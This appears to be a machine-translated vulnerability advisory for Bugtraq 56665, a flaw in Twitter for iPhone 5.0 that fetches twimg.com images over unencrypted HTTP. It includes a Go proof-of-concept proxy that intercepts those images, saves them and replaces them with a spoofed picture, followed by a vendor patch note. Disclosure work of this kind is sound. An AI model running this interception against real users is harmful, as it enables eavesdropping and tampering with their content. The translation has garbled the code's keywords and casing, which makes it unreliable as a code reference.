Twitter for iPhone man-in-the-middle attack Security Vulnerability

Release date:
Updated on:

Affected Systems:
Twitter 5.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56665

Twitter is a foreign social network and microblog service website. It uses wireless networks, wired networks, and communication technologies for instant messaging. It is a typical application of microblogs.

The man-in-the-middle attack vulnerability exists in Twitter for iPhone 5.0 and other versions. The Twitter application communicates with the Twitter API through the HTTPS link, but the image received from * .twimg.com is not encrypted, but only communicates through HTTP. Attackers can exploit this vulnerability to capture and modify images in the application.

<* Source: Carlos Reventlov

Link: view-source: http://www.mondounix.com/twitter-app-5-0-vulnerable-eavesdropping/
Http://reventlov.com/advisories/twitter-app-vulnerable-to-partial-mitm
Http://www.securityfocus.com/archive/1/524812/30/0/threaded
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

/*
Twitter App, eavesdroping PoC

Written by Carlos Reventlov <carlos@reventlov.com>
License MIT
*/

Package main

Import (
"Fmt"
"Github.com/xiam/hyperfox/proxy"
"Github.com/xiam/hyperfox/tools/logger"
"Io"
"Log"
"OS"
"Path"
"Strconv"
"Strings"
)

Const imageFile = "spoof.jpg"

Func init (){
_, Err: = OS. Stat (imageFile)
If err! = Nil {
Panic (err. Error ())
}
}

Func replaceAvatar (pr * proxy. ProxyRequest) error {
Stat, _: = OS. Stat (imageFile)
Image, _: = OS. Open (imageFile)

Host: = pr. Response. Request. Host

If strings. HasSuffix (host, "twimg.com") = true {

If pr. Response. ContentLength! = 0 {

File: = "saved" + proxy. PS + pr. FileName

Var ext string

ContentType: = pr. Response. Header. Get ("Content-Type ")

Switch contentType {
Case "image/jpeg ":
Ext = ". jpg"
Case "image/gif ":
Ext = ". gif"
Case "image/png ":
Ext = ". png"
Case "image/tiff ":
Ext = ". tiff"
}

If ext! = ""{
Fmt. Printf ("** Saving image. \ n ")

OS. MkdirAll (path. Dir (file), OS. ModeDir | OS. FileMode (0755 ))

Fp, _: = OS. Create (file)

If fp = nil {
Fmt. Errorf (fmt. Sprintf ("cocould not open file % s for writing.", file ))
}

Io. Copy (fp, pr. Response. Body)

Fp. Close ()

Pr. Response. Body. Close ()
}

}

Fmt. Printf ("** Sending bogus image. \ n ")

Pr. Response. ContentLength = stat. Size ()
Pr. Response. Header. Set ("Content-Type", "image/jpeg ")
Pr. Response. Header. Set ("Content-Length ",
Strconv. Itoa (int (pr. Response. ContentLength )))
Pr. Response. Body = image
}

Return nil
}

Func main (){

P: = proxy. New ()

P. AddDirector (logger. Client (OS. Stdout ))

P. AddInterceptor (replaceAvatar)

P. AddLogger (logger. Server (OS. Stdout ))

Var err error

Err = p. Start ()

If err! = Nil {
Log. Printf (fmt. Sprintf ("Failed to bind: % s. \ n", err. Error ()))
}
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Twitter
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://itunes.apple.com/cn/app/twitter/id333903271? Mt = 8